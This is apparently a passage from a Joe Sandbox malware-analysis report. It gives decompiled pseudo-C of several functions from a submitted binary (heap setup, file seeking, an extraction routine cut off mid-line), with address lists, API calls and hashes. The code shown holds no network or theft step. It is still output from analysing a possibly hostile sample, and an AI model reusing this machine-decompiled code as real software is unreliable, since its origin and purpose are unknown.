						E0040309D( *((intOrPtr*)(_t118 - 0x78)));
						E00403A9C( *((intOrPtr*)(_t118 - 0x18)));
						 *(_t118 - 4) = 0;
						E004131E0(_t118 + 0xc);
						L8:
						_t38 = _t118 + 0x14; // 0x414be4
						_t115 =  *_t38;
						E00401D7A(_t115, _t118 - 0x30);
						__eflags =  *((intOrPtr*)(_t115 + 4));
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t118 - 0x78)) + 0xe4;
							E00401D7A(_t115,  *((intOrPtr*)(_t118 - 0x78)) + 0xe4);
						}
						_t116 =  *((intOrPtr*)(_t118 - 0x34));
						 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xe0));
					} else {
						E004131E0(_t118 + 0xc);
					}
				}
				 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
				E0040348A(_t118 - 0x94,  *(_t118 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
				return _t116;
			}










                                          0x00402f1a
                                          0x00402f37
                                          0x00402f39
                                          0x00402f45
                                          0x00402f48
                                          0x00402f4e
                                          0x00402f5c
                                          0x00402f61
                                          0x00402f6c
                                          0x00402f6e
                                          0x00402f73
                                          0x00402f77
                                          0x00402f80
                                          0x00402f80
                                          0x00402f79
                                          0x00402f79
                                          0x00402f79
                                          0x00402f86
                                          0x00402f89
                                          0x00402f8c
                                          0x00402f94
                                          0x0040303d
                                          0x00000000
                                          0x00402f9a
                                          0x00402f9d
                                          0x00402fa7
                                          0x00402fb9
                                          0x00402fc2
                                          0x00402fc6
                                          0x00402fda
                                          0x00402fdd
                                          0x00402fe0
                                          0x00402fe3
                                          0x00402fed
                                          0x00402fee
                                          0x00402ff2
                                          0x00402ffb
                                          0x00402fff
                                          0x00403004
                                          0x0040300b
                                          0x00403017
                                          0x0040301b
                                          0x0040301c
                                          0x00403024
                                          0x0040302a
                                          0x00403030
                                          0x00403042
                                          0x00403042
                                          0x00403042
                                          0x0040304b
                                          0x00403050
                                          0x00403053
                                          0x0040305a
                                          0x00403060
                                          0x00403060
                                          0x0040306b
                                          0x00403074
                                          0x00402fc8
                                          0x00402fcb
                                          0x00402fcb
                                          0x00402fc6
                                          0x00403076
                                          0x00403080
                                          0x0040308d
                                          0x00403095

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00402F1A
                                            • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                            • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                            • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                            • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                            • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                            • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$CloseErrorHandleLastShowWindow
                                          • String ID: KA
                                          • API String ID: 2740091781-4133974868
                                          • Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                                          • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                                          • Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                                          • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408902 Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E00408902(intOrPtr* __ecx) {
				long _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t39;
				intOrPtr* _t43;
				intOrPtr* _t59;
				long _t62;
				intOrPtr* _t64;
				void* _t65;

				E00413954(E00419B00, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x10);
						_t39 = E00403A76();
						if(_t39 == 0) {
							_t64 = 0;
						} else {
							 *((intOrPtr*)(_t39 + 4)) = 0x41b5e8;
							 *((intOrPtr*)(_t39 + 8)) = 0;
							 *(_t39 + 0xc) =  *(_t39 + 0xc) | 0xffffffff;
							 *_t39 = 0x41b494;
							 *((intOrPtr*)(_t39 + 4)) = 0x41b484;
							_t64 = _t39;
						}
						E0040640D(_t65 - 0x14, _t64);
						if(E00406434(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t33 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t43 = E00403A76();
					if(_t43 == 0) {
						_t43 = 0;
					} else {
						 *((intOrPtr*)(_t43 + 4)) = 0;
						 *_t43 = 0x41b600;
					}
					E0040640D(_t65 - 0x10, _t43);
					L12:
					_t33 = E00408524(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t33;
				_t34 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
				}
				_t35 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t35 != 0) {
					 *((intOrPtr*)( *_t35 + 8))(_t35);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
			}












                                          0x00408907
                                          0x0040890c
                                          0x0040890d
                                          0x00408913
                                          0x00408915
                                          0x00408918
                                          0x0040891b
                                          0x00408921
                                          0x00408925
                                          0x0040894e
                                          0x00000000
                                          0x00408950
                                          0x00408950
                                          0x00408952
                                          0x0040895a
                                          0x0040897b
                                          0x0040895c
                                          0x0040895c
                                          0x00408963
                                          0x00408966
                                          0x0040896a
                                          0x00408970
                                          0x00408977
                                          0x00408977
                                          0x00408981
                                          0x00408992
                                          0x0040899f
                                          0x00000000
                                          0x00408994
                                          0x00408994
                                          0x00408994
                                          0x00408992
                                          0x00408927
                                          0x00408927
                                          0x00408929
                                          0x00408931
                                          0x0040893e
                                          0x00408933
                                          0x00408933
                                          0x00408936
                                          0x00408936
                                          0x00408944
                                          0x004089a2
                                          0x004089b3
                                          0x004089b3
                                          0x004089b8
                                          0x004089ba
                                          0x004089bf
                                          0x004089c2
                                          0x004089c7
                                          0x004089c7
                                          0x004089ca
                                          0x004089cd
                                          0x004089d3
                                          0x004089d8
                                          0x004089d8
                                          0x004089e3
                                          0x004089eb

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00408907
                                          • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorH_prologLast
                                          • String ID:
                                          • API String ID: 1057991267-0
                                          • Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                                          • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                                          • Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                                          • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004051C8 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E004051C8(void* __ecx, intOrPtr* __edx, void* __eflags) {
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t24;
				long _t27;
				void* _t31;
				void* _t41;
				intOrPtr* _t44;
				void* _t46;

				_t51 = __eflags;
				_t39 = __edx;
				E00413954(E0041965C, _t46);
				_t41 = __ecx;
				_t44 = __edx;
				E00405268(_t46 - 0x1c);
				while(1) {
					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
					_push(_t44);
					_push(_t41);
					_t17 = E0040511B(_t46 - 0x1c, _t39, _t51); // executed
					_t31 = _t46 - 0x1c;
					if(_t17 == 0) {
						break;
					}
					_t21 = E004051A4(_t31);
					_t53 = _t21;
					if(_t21 == 0) {
						_t31 = _t46 - 0x1c;
						break;
					} else {
						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
						E004051A4(_t46 - 0x1c);
						E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
						_t24 = E004058CD( *_t44, _t39, _t53); // executed
						if(_t24 != 0) {
							L6:
							E00405268(_t46 - 0x1c);
							continue;
						} else {
							if(E0040498D( *_t44) != 0) {
								_t20 = 1;
							} else {
								_t27 = GetLastError();
								_t51 = _t27 - 0xb7;
								if(_t27 != 0xb7) {
									L9:
									_t20 = 0;
									__eflags = 0;
								} else {
									goto L6;
								}
							}
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t20;
				}
				E004051A4(_t31);
				E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
				goto L9;
			}












                                          0x004051c8
                                          0x004051c8
                                          0x004051cd
                                          0x004051d7
                                          0x004051d9
                                          0x004051de
                                          0x004051e3
                                          0x004051e3
                                          0x004051e7
                                          0x004051e8
                                          0x004051ec
                                          0x004051f3
                                          0x004051f6
                                          0x00000000
                                          0x00000000
                                          0x004051f8
                                          0x004051fd
                                          0x004051ff
                                          0x00405243
                                          0x00000000
                                          0x00405201
                                          0x00405201
                                          0x00405208
                                          0x00405210
                                          0x00405218
                                          0x0040521f
                                          0x00405239
                                          0x0040523c
                                          0x00000000
                                          0x00405221
                                          0x0040522a
                                          0x00405264
                                          0x0040522c
                                          0x0040522c
                                          0x00405232
                                          0x00405237
                                          0x00405254
                                          0x00405254
                                          0x00405254
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405237
                                          0x0040522a
                                          0x0040521f
                                          0x0040525b
                                          0x00405263
                                          0x00405263
                                          0x00405246
                                          0x0040524e
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004051CD
                                            • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                            • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                                          • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$ErrorLast
                                          • String ID:
                                          • API String ID: 2901101390-0
                                          • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                                          • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                                          • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                                          • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004159F8 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004159F8(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x425a34 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E004158B0(_t12, _t15);
					 *0x425a38 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0041659C();
							goto L5;
						}
					} else {
						_t10 = E00415A55(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x425a34);
							goto L7;
						}
					}
				}
			}








                                          0x004159f8
                                          0x00415a09
                                          0x00415a0f
                                          0x00415a11
                                          0x00415a16
                                          0x00415a4e
                                          0x00415a50
                                          0x00415a18
                                          0x00415a18
                                          0x00415a20
                                          0x00415a25
                                          0x00415a34
                                          0x00415a37
                                          0x00000000
                                          0x00415a39
                                          0x00415a39
                                          0x00000000
                                          0x00415a39
                                          0x00415a27
                                          0x00415a2c
                                          0x00415a3e
                                          0x00415a40
                                          0x00415a51
                                          0x00415a53
                                          0x00415a54
                                          0x00415a42
                                          0x00415a48
                                          0x00000000
                                          0x00415a48
                                          0x00415a40
                                          0x00415a25

                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                            • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                                          • HeapDestroy.KERNEL32 ref: 00415A48
                                            • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Heap$AllocCreateDestroyVersion
                                          • String ID:
                                          • API String ID: 2507506473-0
                                          • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                                          • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                                          • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                                          • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405ACE Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E00405ACE(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t12;
				long _t13;
				long* _t14;

				_push(__ecx);
				_push(__ecx);
				_t12 = _a4;
				_v8 = _a8;
				_v12 = _t12;
				_t13 = SetFilePointer( *__ecx, _t12,  &_v8, _a12); // executed
				_v12 = _t13;
				if(_t13 != 0xffffffff || GetLastError() == 0) {
					_t14 = _a16;
					 *_t14 = _v12;
					_t14[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}








                                          0x00405ad1
                                          0x00405ad2
                                          0x00405ad9
                                          0x00405adc
                                          0x00405ae2
                                          0x00405ae9
                                          0x00405af2
                                          0x00405af5
                                          0x00405b05
                                          0x00405b0b
                                          0x00405b10
                                          0x00000000
                                          0x00405b01
                                          0x00000000
                                          0x00405b01

                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                                          • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                                          • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                                          • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040BBC9 Relevance: 2.0, APIs: 1, Instructions: 515COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040BBC9(signed char __edx) {
				signed int _t287;
				signed char _t289;
				signed int _t291;
				signed char _t292;
				signed char _t295;
				signed char _t305;
				intOrPtr _t307;
				signed char _t308;
				signed char _t314;
				intOrPtr _t315;
				signed char _t323;
				signed char _t325;
				signed char _t329;
				signed char _t330;
				signed char _t334;
				signed char _t335;
				signed char _t340;
				signed char _t345;
				signed char _t349;
				signed char _t351;
				signed char _t352;
				signed char _t356;
				signed char _t368;
				signed char _t372;
				signed int _t380;
				intOrPtr _t388;
				intOrPtr _t397;
				signed char _t401;
				signed char _t407;
				signed char _t408;
				intOrPtr _t410;
				intOrPtr _t475;
				signed char _t485;
				signed int _t488;
				signed char _t489;
				intOrPtr* _t490;
				signed int _t492;
				intOrPtr _t498;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed char _t506;
				signed int _t508;
				intOrPtr _t509;
				void* _t510;
				void* _t512;

				_t485 = __edx;
				_t287 = E00413954(E0041A262, _t510);
				_t407 = 0;
				 *(_t510 - 4) = 0;
				 *((char*)(_t510 - 0x4c)) = _t287 & 0xffffff00 |  *(_t510 + 0x14) != 0x00000000;
				_t289 =  *(_t510 + 0x18);
				 *((intOrPtr*)(_t510 - 0x10)) = _t512 - 0x124;
				 *(_t510 + 0x18) = _t289;
				if(_t289 != 0) {
					 *((intOrPtr*)( *_t289 + 4))(_t289);
				}
				 *(_t510 - 4) = 1;
				 *(_t510 - 0x1c) = _t407;
				 *(_t510 - 0x18) = _t407;
				 *((char*)(_t510 + 0x17)) =  *(_t510 + 0x10) == 0xffffffff;
				if( *((char*)(_t510 + 0x17)) != 0) {
					 *(_t510 + 0x10) =  *( *(_t510 + 8) + 0x7c);
				}
				if( *(_t510 + 0x10) != _t407) {
					E00402155(_t510 - 0x30);
					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
					_t291 = 0;
					__eflags = 0;
					 *(_t510 - 4) = 2;
					 *(_t510 - 0x34) = 0;
					while(1) {
						__eflags = _t291 -  *(_t510 + 0x10);
						if(_t291 >=  *(_t510 + 0x10)) {
							break;
						}
						__eflags =  *((char*)(_t510 + 0x17));
						if( *((char*)(_t510 + 0x17)) == 0) {
							_t291 =  *( *(_t510 + 0xc) + _t291 * 4);
						}
						_t496 =  *(_t510 + 8);
						 *(_t510 - 0x38) = _t291;
						_t508 =  *( *((intOrPtr*)( *(_t510 + 8) + 0x1c8)) + _t291 * 4);
						__eflags = _t508 - 0xffffffff;
						if(_t508 != 0xffffffff) {
							_t380 =  *(_t510 - 0x28);
							__eflags = _t380 - _t407;
							if(_t380 == _t407) {
								L16:
								 *(_t510 - 0x7c) =  *(_t510 - 0x7c) | 0xffffffff;
								 *(_t510 - 0x78) = _t508;
								E0040C3F8(_t510 - 0x74);
								 *(_t510 - 0x5c) = _t407;
								 *(_t510 - 0x58) = _t407;
								_push(_t510 - 0x7c);
								 *(_t510 - 4) = 5;
								E0040C46D(_t510 - 0x30);
								 *(_t510 - 4) = 2;
								E004042AD(_t510 - 0x74);
								_t475 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t496 + 0x58)) + _t508 * 4)));
								_t67 = _t510 - 0x1c;
								 *_t67 =  *(_t510 - 0x1c) + _t475;
								__eflags =  *_t67;
								_t388 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
								asm("adc [ebp-0x18], edx");
								 *((intOrPtr*)(_t388 + 0x20)) = _t475;
								 *(_t388 + 0x24) = _t485;
								L17:
								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) +  *(_t510 - 0x28) * 4 - 4));
								_t410 =  *((intOrPtr*)( *((intOrPtr*)( *(_t510 + 8) + 0x1b4)) + _t508 * 4));
								_t509 =  *((intOrPtr*)(_t498 + 0x10));
								while(1) {
									_t393 =  *(_t510 - 0x38) - _t410;
									__eflags = _t509 -  *(_t510 - 0x38) - _t410;
									if(_t509 >  *(_t510 - 0x38) - _t410) {
										goto L13;
									}
									_t87 = _t498 + 8; // 0xa
									E0040C413(_t87, _t393 & 0xffffff00 | __eflags == 0x00000000);
									_t509 = _t509 + 1;
								}
								goto L13;
							}
							_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t380 * 4 - 4));
							__eflags = _t508 -  *((intOrPtr*)(_t397 + 4));
							if(_t508 ==  *((intOrPtr*)(_t397 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t508);
							_push(_t291);
							_push(E0040C30E(_t510 - 0x130));
							 *(_t510 - 4) = 3;
							E0040C46D(_t510 - 0x30);
							 *(_t510 - 4) = 2;
							E004042AD(_t510 - 0x128);
							L13:
							_t291 =  *(_t510 - 0x34) + 1;
							_t407 = 0;
							 *(_t510 - 0x34) = _t291;
							continue;
						}
					}
					_t292 =  *(_t510 + 0x18);
					__eflags =  *((intOrPtr*)( *_t292 + 0xc))(_t292,  *(_t510 - 0x1c),  *(_t510 - 0x18)) - _t407;
					if(__eflags == 0) {
						E0040AC6A(_t510 - 0x108, __eflags, 1);
						_push(0x38);
						 *(_t510 - 4) = 7;
						 *(_t510 - 0x40) = _t407;
						 *(_t510 - 0x3c) = _t407;
						 *(_t510 - 0x1c) = _t407;
						 *(_t510 - 0x18) = _t407;
						_t295 = E00403A76();
						 *(_t510 + 0x10) = _t295;
						__eflags = _t295 - _t407;
						 *(_t510 - 4) = 8;
						if(_t295 == _t407) {
							_t501 = 0;
							__eflags = 0;
						} else {
							_t501 = E004072A1(_t295);
						}
						_t488 = _t501;
						__eflags = _t501 - _t407;
						 *(_t510 - 4) = 7;
						 *(_t510 - 0x38) = _t488;
						 *(_t510 - 0x14) = _t501;
						if(_t501 != _t407) {
							 *((intOrPtr*)( *_t501 + 4))(_t501);
						}
						_push(_t407);
						 *(_t510 - 4) = 9;
						E00407334(_t501,  *(_t510 + 0x18));
						_t502 = 0;
						__eflags = 0;
						 *(_t510 + 0x14) = 0;
						while(1) {
							 *(_t488 + 0x28) =  *(_t510 - 0x1c);
							 *(_t488 + 0x2c) =  *(_t510 - 0x18);
							 *(_t488 + 0x20) =  *(_t510 - 0x40);
							 *(_t488 + 0x24) =  *(_t510 - 0x3c);
							_t489 = E00407410(_t488);
							__eflags = _t489 - _t407;
							if(_t489 != _t407) {
								break;
							}
							__eflags = _t502 -  *(_t510 - 0x28);
							if(_t502 <  *(_t510 - 0x28)) {
								_push(0x38);
								 *(_t510 - 0x48) = _t407;
								 *(_t510 - 0x44) = _t407;
								_t490 =  *((intOrPtr*)( *((intOrPtr*)(_t510 - 0x24)) + _t502 * 4));
								 *((intOrPtr*)(_t510 - 0x54)) =  *((intOrPtr*)(_t490 + 0x20));
								 *((intOrPtr*)(_t510 - 0x50)) =  *((intOrPtr*)(_t490 + 0x24));
								_t305 = E00403A76();
								 *(_t510 + 0xc) = _t305;
								__eflags = _t305 - _t407;
								 *(_t510 - 4) = 0xb;
								if(_t305 == _t407) {
									_t408 = 0;
									__eflags = 0;
								} else {
									_t408 = E0040C5E8(_t305);
								}
								__eflags = _t408;
								 *(_t510 - 0x34) = _t408;
								 *(_t510 - 4) = 9;
								 *(_t510 + 0x10) = _t408;
								if(_t408 != 0) {
									 *((intOrPtr*)( *_t408 + 4))(_t408);
								}
								 *(_t510 - 4) = 0xc;
								_t503 =  *(_t510 + 8) + 0x10;
								_t307 =  *_t490;
								__eflags = _t307 - 0xffffffff;
								if(_t307 == 0xffffffff) {
									_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x1a4)) +  *(_t490 + 4) * 4));
								}
								__eflags =  *( *(_t510 + 8) + 0x1e0);
								_t173 = _t490 + 8; // 0x8
								_t308 = E0040C73A(_t408, _t503, 0, _t307, _t173,  *(_t510 + 0x18),  *((intOrPtr*)(_t510 - 0x4c)),  *(_t510 + 8) & 0xffffff00 |  *( *(_t510 + 8) + 0x1e0) != 0x00000000); // executed
								__eflags = _t308;
								 *(_t510 + 0xc) = _t308;
								if(_t308 == 0) {
									__eflags =  *_t490 - 0xffffffff;
									if( *_t490 == 0xffffffff) {
										_t492 =  *(_t490 + 4) << 2;
										 *(_t510 + 0xc) =  *( *((intOrPtr*)(_t503 + 0x48)) + _t492);
										 *(_t510 - 0x48) = E0040C2CD(_t503,  *(_t490 + 4));
										 *(_t510 - 0x44) = _t485;
										 *(_t510 - 4) = 0xe;
										_t485 =  *( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3) + 4);
										asm("adc edx, [esi+0x14c]");
										_t314 = E0040AD19(_t510 - 0x108, __eflags,  *((intOrPtr*)( *(_t510 + 8) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3))) +  *((intOrPtr*)(_t503 + 0x148)), _t485,  *((intOrPtr*)(_t503 + 0xc)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3),  *(_t510 + 0xc),  *(_t510 + 0x10),  *(_t510 - 0x14)); // executed
